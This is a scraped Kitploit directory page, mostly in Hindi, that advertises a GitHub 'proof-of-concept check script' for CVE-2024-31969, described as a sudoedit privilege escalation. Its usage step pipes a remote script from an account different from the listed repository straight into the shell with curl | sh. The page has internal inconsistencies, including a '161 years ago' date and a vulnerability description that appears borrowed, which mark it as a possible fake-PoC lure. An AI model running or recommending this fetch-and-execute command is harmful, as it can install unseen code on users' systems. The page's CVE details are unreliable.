Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-31969 — CVE-2024-31969 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट जाँच स्क्रिप्ट और दस्तावेज़ प्रदान करता है, जो sudo के sudoedit में एक स्थानीय विशेषाधिकार वृद्धि है, जिसमें प्रभावित संस्करण और शमन मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/gmh5225/cve-2024-31969
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणलर्निंग और शिक्षाचयनित संसाधन
GitHubgmh5225/cve-2024-31969

CVE-2024-31969

CVE-2024-31969 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट जाँच स्क्रिप्ट और दस्तावेज़ प्रदान करता है, जो sudo के sudoedit में एक स्थानीय विशेषाधिकार वृद्धि है, जिसमें प्रभावित संस्करण और शमन मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
161 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

📌 CVE-2024-31969

CVE-2024-31969 sudo में sudoedit कमांड का उपयोग करते समय एक local privilege escalation भेद्यता है।

यह भेद्यता sudo 1.9.0 से शुरू हुई है, क्योंकि sudoedit उपयोगकर्ता के environment variable और फ़ाइल स्वामित्व को सही ढंग से मान्य नहीं करता है।


📖 विवरण

A flaw introduced in sudo 1.9.0 in how sudoedit validated users' environment variables and file ownership.

यह भेद्यता sudoedit एक्सेस वाले स्थानीय उपयोगकर्ता को SUDO_EDITOR जैसे environment variable में हेरफेर करके, या symlink का लाभ उठाकर, root के रूप में arbitrary फ़ाइलों को संशोधित करने की अनुमति देती है।


📊 प्रभावित Sudo संस्करण:

Sudo संस्करणस्थिति
1.9.0 → 1.9.15p4🔥 असुरक्षित
1.9.15p5 और उससे ऊपर✅ सुरक्षित
1.8.x (1.8.23 सहित)❌ प्रभावित नहीं

📦 इंस्टॉलेशन और उपयोग की विधि

निम्नलिखित कमांड चलाएँ:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ समाधान / शमन

  • sudo को 1.9.15p5 या उससे नए संस्करण में अपडेट करें।
  • गैर-root उपयोगकर्ताओं के लिए sudoedit की अनुमति देने वाले sudoers नियमों को सीमित करें।
  • /etc/sudoers फ़ाइल में सुरक्षित env_keep या env_reset कॉन्फ़िगरेशन का उपयोग करें।

📚 संदर्भ

  • NVD पर CVE-2024-31969

⚠️ अस्वीकरण

यह रिपॉजिटरी शैक्षिक और सिस्टम सुरक्षा दस्तावेज़ीकरण उद्देश्यों के लिए बनाई गई है।
इस जानकारी का उपयोग अवैध गतिविधियों या सिस्टम स्वामी की लिखित अनुमति के बिना करना सख्त वर्जित है।
किसी भी प्रकार का दुरुपयोग पूरी तरह से निर्माता की जिम्मेदारी से बाहर है।

टूल डाउनलोड करें